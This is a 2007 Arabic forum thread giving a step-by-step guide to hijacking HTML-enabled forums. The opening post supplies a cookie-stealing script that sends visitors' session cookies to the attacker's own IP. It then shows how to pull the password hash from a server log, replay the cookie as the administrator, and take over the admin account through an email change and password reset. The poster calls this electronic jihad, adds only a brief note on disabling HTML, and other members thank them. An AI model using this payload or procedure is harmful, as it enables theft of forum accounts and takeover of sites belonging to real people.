اختراق المنتديات عن طريق ثغرة Html

بنت الاما11كن · #1 (**permalink**) 10-11-2007, 06:33 AM

[align=center]

بسم الله الرحمن الرحيم
طبعا في البداية اخواني اقسم بالله العضيم ان لا استعمل هذه الطريقة ضد المنتيدات المسلمة بل ضد المنتديات الي تسيئ الى الاسلام

طرق اختراق المنتديات مجربه وفعاله

شرح الاختراق

الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<******>document.write('<img
src="http://my_ip_address/'+document.******************************e+'">';</******>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb

ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f
8;%20bbthreadview[54

20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <******> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .

وهيه تعبتر من الجهاد الكتروني

وطواط · #2 (**permalink**) 10-11-2007, 09:13 AM

مشكوره اختي على الشرح المميز
اخوكم\\وطواط

مستلج الرياض · #3 (**permalink**) 10-11-2007, 11:07 AM

يعطيك العافية الشرح حلو وواضح

وإلى الامام

>>>>>>>>>>> مستلج الرياض

سيـف الله · #4 (**permalink**) 10-11-2007, 03:53 PM

بارك الله فيك

بنت الاما11كن · #5 (**permalink**) 10-11-2007, 08:34 PM

وطواااااااط

يسلمووووووووووووووووو ع المرور منور الصفحه

مستلج الرياااااض

مشكوووووووووووور ع المرور منور صفحتى

$منتديات جسد اللقافة ينتهي في 15\2\1429 هـ$	$'منتدى لحظات لكل جديد ومفيد حيث المتعه والفائده ينتهي في 13\12\1429 هـ$	$موقع احطك بعيوني ينتهي في 19\12\1429 هـ$
$عقارية المدينة ينتهي في 12\12\1429 هـ$	$حراج سيارات شراء استبدال بيع جديدة و مستعملة جميع أنواع السيارات ينتهي في 12\5\1430 هـ$
$مركز تحميل فلفة ينتهي في 16\12\1429 هـ$	$'للاعلان بالموقع 0\0\1429 هـ$	$شبكة ورود الروح ينتهي في 16\12\1429 هـ$

الاستضافة الاقتصادية	directory	رسائل	دردشة شات	هاكات
مكتبة الفلاش الإسلامي	الثقافة الجنسية	صور	حدد مكان الاي بي	الأسره المسلمه
ابتسامات	العاب	دليل مواقع	احداثيات المناطق	القرآن
بطاقات	جوال	جافا java	قصص روايات	افلام
كتب	ماسنجر	خطوط	دليل مواد	دردشة

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري